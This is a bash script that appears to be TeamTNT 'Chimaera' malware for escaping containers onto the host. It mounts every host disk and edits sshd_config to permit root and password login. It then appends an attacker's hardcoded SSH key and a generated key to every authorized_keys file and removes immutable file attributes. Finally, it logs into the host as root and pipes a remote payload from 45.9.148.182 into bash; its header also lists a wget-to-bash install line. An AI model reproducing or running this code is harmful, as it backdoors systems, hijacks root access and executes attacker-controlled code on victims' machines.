#!/bin/bash
#
#	TITLE:		Chimaera_ALL_IN_ON_NGROK_SCRIPT
#	AUTOR:		hilde@teamtnt.red
#	VERSION:	Chimaera_stable_V0.00.1
#	DATE:		01.09.2021
#
#	SRC:        wget -O- http://chimaera.cc/sh/MOUNTSPLOIT_V2.sh.txt | bash
#				wget http://chimaera.cc/sh/MOUNTSPLOIT_V2.sh.txt -O /var/tmp/.ms2
#				bash /var/tmp/.ms2
#
########################################################################

apk add bash openssh-client 2>/dev/null
apt-get update --fix-missing 2>/dev/null; apt-get install -y bash openssh-server 2>/dev/null
yum install -y bash openssh-server 2>/dev/null


IDRSA_PUBKEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYmuFzpuEpN/KHPbQkSUT1Xe/gVl3FpIe/GlhJEnW84rCMsYhRe2xxcPc1xfZd10JBhM1kEhs5aycIYiPvLYTRi7mA88hE15OVCkwgPT2HgaY8oetbiNiu18jBygbnku2/avpf/Xl2vkcNJRwHjkik3/Vid9fSleNWeAI+RGrMRRiP4hXVBQjHbuSFlw2VDg0uZINodP+n8oWBDHGnMGei9W6OXxQ3R5C+oKBw9NA3K/drsqvJh81jbEkDXyqCG0Nj0sAUk6o/aGIIQpwxI3ez2Vi/lqm5LYsRO6ICsHP6RXJT/08XkUVNMu7BLnje2RCG/kSKjVqW8QePyajHJ64kHwYf1yeyGfObZJWhUSP3yPK6UtGxBouyA/TPTqvba4vAmUy1Jl7hyWkoa4KUwgmsEizmT9n8GEg1USPXxRWNqv0VIi5160tcoujrB85HYwjwIhbphCqhTKyNwnnFJNratI1hGurgr8t0fflC/igLph8PapiayTwTLEbNwSUwVp8D3rvBkYB+XV2wO4+q24IoNZJO6ePXEA80jAVEa7eGhlnV5BUIIG+pYP/CkukcggyW+vGRTrl07KrvhAn9dLGDg1J8KZM2hMx5L/2ulgjKTjPZI566fL6Y0dDhPJZH8bxAq6i/ciXXZFeuaG4eCDkitPdSzhFtyuZQj712h6NLow== hilde@teamtnt.red'




function SSH_OPTIONS(){
find /.host/ -name sshd_config 2>/dev/null >> /var/tmp/sshconfig.dat
cat /var/tmp/sshconfig.dat | sort -u >> /var/tmp/sshconfig.txt
rm -f /var/tmp/sshconfig.dat

while read SSHDCONFIGFILE; do
sed -i '/PermitRootLogin/c\PermitRootLogin yes' $SSHDCONFIGFILE
sed -i '/PasswordAuthentication/c\PasswordAuthentication yes' $SSHDCONFIGFILE
sed -i '/PubkeyAuthentication/c\PubkeyAuthentication yes' $SSHDCONFIGFILE
done < /var/tmp/sshconfig.txt
rm -f /var/tmp/sshconfig.txt

}





fdisk -lu | grep '/dev/' | grep -v Disk | awk '{print $1}' >> /var/tmp/dev_path.dat
lvdisplay 2>/dev/null | grep 'LV Path' | awk '{print $3}' >> /var/tmp/dev_path.dat
cat /var/tmp/dev_path.dat | sort -u >> /var/tmp/dev_path.txt
rm -f /var/tmp/dev_path.dat
mkdir -p /.host/


while read DEV_PATH; do
DIRNAME=$(echo $DEV_PATH | sed -e 's/\/.*\///g')
mkdir -p /.host/$DIRNAME
mount $DEV_PATH /.host/$DIRNAME
done < /var/tmp/dev_path.txt
rm -f /var/tmp/dev_path.txt



find /.host/ -name authorized_keys 2>/dev/null >> /var/tmp/auth
find /.host/ -name authorized_keys2 2>/dev/null >> /var/tmp/auth
cat /var/tmp/auth | sort -u >> /var/tmp/auth.dat
rm -f /var/tmp/auth

if [ ! -f "/root/id_rsa" ]; then ssh-keygen -f /root/id_rsa -N "" ; fi



while read AUTHKEYFILE; do
echo $IDRSA_PUBKEY >> $AUTHKEYFILE
cat /root/id_rsa.pub >> $AUTHKEYFILE
done < /var/tmp/auth.dat
rm -f /var/tmp/auth.dat


if [ -d "/host/" ]; then
chattr -ia / /host/ /host/root/ /host/root/.ssh/ /host/root/.ssh/authorized_keys /host/root/.ssh/authorized_keys2 2>/dev/null
mkdir -p /host/root/.ssh/ 2>/dev/null
cat /root/id_rsa.pub >> /host/root/.ssh/authorized_keys
cat /root/id_rsa.pub > /host/root/.ssh/authorized_keys2
export SSH_PORT=$(cat /host/etc/ssh/sshd_config | grep "Port " | awk '{print $2}')




fi

if [ -z "$SSH_PORT" ]; then export SSH_PORT=22; fi

ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i /root/id_rsa root@127.0.0.1 -p$SSH_PORT "nohup curl http://45.9.148.182/cmd/Kubernetes_root_PayLoad_2.sh | bash &"








